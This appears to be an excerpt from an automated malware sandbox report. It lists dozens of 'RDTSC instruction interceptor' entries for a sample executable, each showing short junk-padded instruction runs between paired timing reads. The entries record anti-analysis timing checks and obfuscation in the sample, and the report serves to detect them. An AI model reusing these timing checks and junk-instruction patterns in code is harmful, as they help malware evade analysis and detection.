push edx 0x00000063 jl 00007FB3DD3D95E6h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B6C6D0 second address: B6C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC1EEE second address: BC1F03 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3DD3D95EEh 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC99A8 second address: BC99BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BBBh 0x00000009 popad 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC99BC second address: BC99C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC99C8 second address: BC99CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC9B16 second address: BC9B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC9F24 second address: BC9F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BCA34E second address: BCA354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BCA354 second address: BCA358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD2133 second address: BD2148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4FF1D second address: B4FF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD09D8 second address: BD09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB3DD3D95F4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD0E26 second address: BD0E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD0E2C second address: BD0E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD0E30 second address: BD0E5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FB3DD280BBEh 0x00000012 pushad 0x00000013 jne 00007FB3DD280BB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1144 second address: BD1148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1148 second address: BD114E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD114E second address: BD1158 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB3DD3D95ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD12AF second address: BD12B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD12B7 second address: BD12CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB3DD3D95E6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB3DD3D95E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD12CC second address: BD12D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1592 second address: BD159C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD159C second address: BD15C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3DD280BC9h 0x00000008 jc 00007FB3DD280BB6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15C7 second address: BD15D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15D1 second address: BD15D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15D5 second address: BD15DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15DB second address: BD15E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15E7 second address: BD15ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15ED second address: BD15F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD15F7 second address: BD1606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1606 second address: BD160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD177E second address: BD17A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FB3DD3D95FBh 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FB3DD3D95F3h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1ABE second address: BD1AD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1AD2 second address: BD1AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB3DD3D95F5h 0x0000000d jmp 00007FB3DD3D95EDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1AFC second address: BD1B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4FF12 second address: B4FF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD1FD9 second address: BD1FE3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB3DD280BB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD5FED second address: BD5FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD5FF2 second address: BD5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD5B3F second address: BD5B4D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD5B4D second address: BD5B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD5B51 second address: BD5B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD889E second address: BD88C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FB3DD280BBAh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB3DD280BC3h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD88C7 second address: BD88F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F7h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB3DD3D95ECh 0x00000011 jno 00007FB3DD3D95E6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A43 second address: BD8A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A47 second address: BD8A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A4D second address: BD8A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB3DD280BBDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A64 second address: BD8A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A68 second address: BD8A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FB3DD280BC0h 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8A84 second address: BD8A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8BE7 second address: BD8BF1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8BF1 second address: BD8C0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB3DD3D95EAh 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f je 00007FB3DD3D95E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8C0D second address: BD8C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB3DD280BBDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BD8C23 second address: BD8C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BDD293 second address: BDD2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE317E second address: BE318E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB3DD3D95E6h 0x00000008 jl 00007FB3DD3D95E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE318E second address: BE319A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007FB3DD280BB6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE319A second address: BE31A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE31A4 second address: BE31AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE31AA second address: BE31AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B45E6D second address: B45E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FB3DD280BB6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B45E7D second address: B45EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a jp 00007FB3DD3D95E6h 0x00000010 ja 00007FB3DD3D95E6h 0x00000016 jmp 00007FB3DD3D95F0h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007FB3DD3D95E6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1B29 second address: BE1B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1C8E second address: BE1C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FB3DD3D95E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1C9A second address: BE1C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1C9E second address: BE1CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD3D95F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FB3DD3D95ECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1E43 second address: BE1E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3DD280BBAh 0x00000010 push eax 0x00000011 jl 00007FB3DD280BB6h 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1E74 second address: BE1E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1FD5 second address: BE1FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2401 second address: BE240C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE240C second address: BE2439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC5h 0x00000009 jmp 00007FB3DD280BC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2584 second address: BE2588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2588 second address: BE259F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB3DD280BB8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jng 00007FB3DD280BB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2EE6 second address: BE2F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007FB3DD3D95F3h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6294 second address: BE6299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6299 second address: BE62DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FB3DD3D95E8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB3DD3D95F2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE62DB second address: BE62DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE62DF second address: BE62E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6436 second address: BE6440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE658D second address: BE6599 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66C2 second address: BE66CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66CD second address: BE66D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66D2 second address: BE66D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66D8 second address: BE66EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB3DD3D95E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEE3DE second address: BEE3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEE3E2 second address: BEE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEC662 second address: BEC673 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FB3DD280BB6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEC673 second address: BEC677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF12 second address: BECF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB3DD280BB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FB3DD280BB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF25 second address: BECF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF29 second address: BECF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF35 second address: BECF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF3A second address: BECF3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED24E second address: BED252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED545 second address: BED54B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
